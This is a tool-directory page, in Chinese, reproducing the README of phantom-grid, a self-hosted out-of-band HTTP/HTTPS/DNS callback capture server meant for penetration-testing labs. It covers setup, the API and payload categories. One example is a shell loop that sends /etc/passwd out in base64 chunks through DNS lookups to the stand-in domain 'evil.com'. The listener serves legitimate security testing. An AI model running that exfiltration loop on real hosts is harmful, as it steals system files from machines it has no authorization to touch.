Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
phantom-grid — 免费 Burp Collaborator 替代方案——通过 SQLite 与数据外泄重组实现 OOB 交互捕获(HTTP/HTTPS/DNS) | Kitploit
工具/GitHubGitHub/evkir/phantom-grid
Payload生成漏洞分析Web应用程序漏洞利用数据泄露信息收集Web安全渗透测试实用工具与框架红队DNS 分析
GitHubevkir/phantom-grid

phantom-grid

1121个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

免费 Burp Collaborator 替代方案——通过 SQLite 与数据外泄重组实现 OOB 交互捕获(HTTP/HTTPS/DNS)

查看仓库网站

Phantom Grid

⬡ Phantom Grid

面向渗透测试实验室的免费开源 Burp Collaborator 替代方案
带外(OOB)交互捕获 · HTTP/HTTPS · DNS · SQLite · 外带数据重组


这是什么?

Phantom Grid 是一款自托管的 OOB(带外)交互捕获工具——一个免费的 Burp Collaborator 替代方案,用于解决渗透测试实验室(PortSwigger Web Security Academy、HackTheBox、TryHackMe 等)中的挑战。

v2.0 功能特性

功能描述
HTTP + HTTPS 捕获双协议栈,自动生成自签名 TLS 证书
DNS 捕获内置 DNS 服务器,监听 53 端口
DNS 外带数据重组自动重组多段 DNS 外带数据
SQLite 持久化所有数据在服务器重启后依然保留(WAL 模式提升性能)
40+ Payload 模板SSRF、XXE、SQLi OOB、CMDi、SSTI、DNS 外带——即取即用
战术仪表盘指挥中心式 UI,支持实时监控
Docker 就绪一条命令即可部署
REST API完整的 token/交互/外带数据管理 API

快速开始

方式一:Python

git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
pip install -r server/requirements.txt

# 仅 HTTP
python server/server.py

# HTTP + HTTPS(自动生成自签名证书)
python server/server.py --https

# 完整协议栈(DNS 53 端口需要 sudo 权限)
sudo python server/server.py --https --dns

方式二:Docker

git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
docker compose up -d

方式三:ngrok(适用于没有 VPS 的实验室环境)

python server/server.py --https &
ngrok http 9090
# 在 payload 中使用 ngrok 提供的 HTTPS URL

架构

┌──────────────────────────────────────────────────────────────┐
│                      PHANTOM GRID v2.0                        │
│                                                               │
│  ┌─────────────┐      ┌─────────────────────────────────┐   │
│  │  Dashboard   │─API─▶│  Flask Server                   │   │
│  │  (React)     │      │                                 │   │
│  └─────────────┘      │  :9090  HTTP  capture + API     │   │
│                         │  :9443  HTTPS capture + API     │   │
│  ┌─────────────┐      │  :53    DNS   capture            │   │
│  │ Target App   │─────▶│                                 │   │
│  └─────────────┘      └──────────┬──────────────────────┘   │
│                                    │                          │
│                         ┌──────────▼──────────┐              │
│                         │   SQLite Database    │              │
│                         │   phantom_grid.db    │              │
│                         │                      │              │
│                         │  tokens              │              │
│                         │  interactions         │              │
│                         │  dns_exfil_sessions  │              │
│                         │  dns_exfil_chunks    │              │
│                         └─────────────────────┘              │
│                                                               │
└──────────────────────────────────────────────────────────────┘

HTTPS 支持

现代应用通常会阻止混合内容请求(从 https:// 页面发起 http:// 请求)。Phantom Grid v2.0 在 HTTP 之外同时运行 HTTPS。

自动生成自签名证书

python server/server.py --https
# 自动生成 certs/server.pem + certs/server.key
# HTTPS 可通过 https://0.0.0.0:9443 访问

自定义证书(Let's Encrypt 等)

python server/server.py --https \
  --cert /etc/letsencrypt/live/yourdomain/fullchain.pem \
  --key /etc/letsencrypt/live/yourdomain/privkey.pem

配合 ngrok(即时公网 HTTPS)

python server/server.py &
ngrok http 9090
# ngrok 会自动提供一个受信任的 HTTPS URL

DNS 外带数据重组

Phantom Grid 会自动重组分段的 DNS 外带数据。这对于提取必须拆分到多次 DNS 查询中的大型 payload 至关重要(每个标签限制为 63 字节)。

支持的格式

格式示例使用场景
简单data.TOKEN.domain单值外带
带索引0.chunk1.TOKEN.domain自动会话,有序分块
带标签sess1.0.chunk1.TOKEN.domain命名会话并带排序
结束信号end.sess1.TOKEN.domain标记会话完成

示例:通过 DNS 外带 /etc/passwd

在目标主机上:

# 将文件拆分为 50 字节的 base64 分块并通过 DNS 发送
data=$(base64 /etc/passwd | tr -d '\n')
token="a1b2c3d4e5f6"
domain="evil.com"
i=0
while [ -n "$data" ]; do
  chunk=$(echo "$data" | cut -c1-50)
  data=$(echo "$data" | cut -c51-)
  nslookup "exfil.$i.$chunk.$token.$domain" >/dev/null 2>&1
  i=$((i+1))
done
nslookup "end.exfil.$token.$domain" >/dev/null 2>&1

查看重组后的数据:

curl http://localhost:9090/api/tokens/a1b2c3d4e5f6/exfil

响应:

[{
  "session_tag": "exfil",
  "completed": 1,
  "chunk_count": 12,
  "reassembled": "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYm..."
}]

SQLite 持久化

所有数据都存储在 phantom_grid.db 中,使用 SQLite WAL 模式以实现并发读写性能。

phantom_grid.db
├── tokens                 — Token 元数据
├── interactions            — 所有 HTTP/DNS 捕获记录
├── dns_exfil_sessions     — 分组的外带会话
└── dns_exfil_chunks       — 单个外带数据分块

数据在服务器重启后依然保留。通过复制 phantom_grid.db 即可备份。


API 参考

Tokens

方法端点描述
GET/api/tokens列出所有 token 及其统计信息
POST/api/tokens创建 token {"label": "...", "notes": "..."}
PATCH/api/tokens/<id>更新 token 标签/备注
DELETE/api/tokens/<id>删除 token 及所有数据(级联删除)

交互记录

方法端点描述
GET/api/tokens/<id>/interactions?limit=&offset=获取 token 的交互记录
DELETE/api/tokens/<id>/interactions清空交互记录
GET/api/log?limit=全局日志(所有 token)
GET/api/poll?since=<ISO>轮询新交互记录

DNS 外带数据

方法端点描述
GET/api/tokens/<id>/exfil获取外带会话及重组后的数据

系统

方法端点描述
GET/api/stats全局统计(计数、数据库大小)
GET/health健康检查

捕获端点

协议端点
HTTPhttp://server:9090/c/<TOKEN>
HTTPShttps://server:9443/c/<TOKEN>
DNS<TOKEN>.yourdomain.com
DNS 外带<data>.<TOKEN>.yourdomain.com

CLI 选项

python server.py [OPTIONS]

  --port N          HTTP 端口(默认:9090)
  --https           启用 HTTPS 服务器
  --https-port N    HTTPS 端口(默认:9443)
  --cert PATH       自定义 TLS 证书(PEM)
  --key PATH        自定义 TLS 密钥文件
  --dns             启用 DNS 捕获服务器
  --dns-port N      DNS 端口(默认:53)
  --dns-ip IP       DNS 响应中返回的 IP(默认:127.0.0.1)
  --db PATH         SQLite 数据库路径(默认:phantom_grid.db)

与其他方案的对比

功能Burp CollaboratorInteractshPhantom Grid
价格Burp Pro($$$)免费免费
HTTP/HTTPS✅✅✅
DNS 捕获✅✅✅
DNS 外带数据重组❌❌✅
SMTP 捕获✅✅❌(路线图中)
自托管❌✅✅
自定义域名❌✅✅
持久化存储不适用❌✅(SQLite)
仪表盘 UIBurp SuiteCLIWeb UI
Payload 模板❌❌✅(40+)

Payload 分类

仪表盘包含 40+ 个即取即用的 payload:

  • HTTP 回调 — GET、cURL、wget、PowerShell、Python
  • SSRF — 直接、URL 编码、双重编码、gopher、IMDS 重定向
  • XXE — 外部实体、参数实体、OOB DTD 外带
  • SQL 注入 OOB — Oracle UTL_HTTP、MSSQL xp_dirtree/xp_cmdshell、MySQL LOAD_FILE、PostgreSQL COPY
  • 命令注入 — 反引号、$()、管道、分号、换行、DNS 外带
  • DNS 查询 — 子域名、nslookup、dig、数据外带
  • SSTI — Jinja2、ERB、Freemarker、Twig
  • 邮件/SMTP — 头部注入、IMAP 回调

免责声明

仅限用于经授权的渗透测试、安全研究和教育实验室环境。 在测试非自有系统之前,请务必获得适当授权。作者不对任何滥用行为负责。


贡献

欢迎提交 PR!路线图:

  • SMTP/邮件回调捕获
  • Let's Encrypt 自动证书(ACME)
  • WebSocket 实时推送(替代轮询)
  • FTP 回调捕获
  • Webhook 通知(Slack、Discord、Telegram)
  • 多用户认证
  • 导出为 CSV/JSON
  • LDAP 回调捕获

许可证

MIT — 参见 LICENSE

下载工具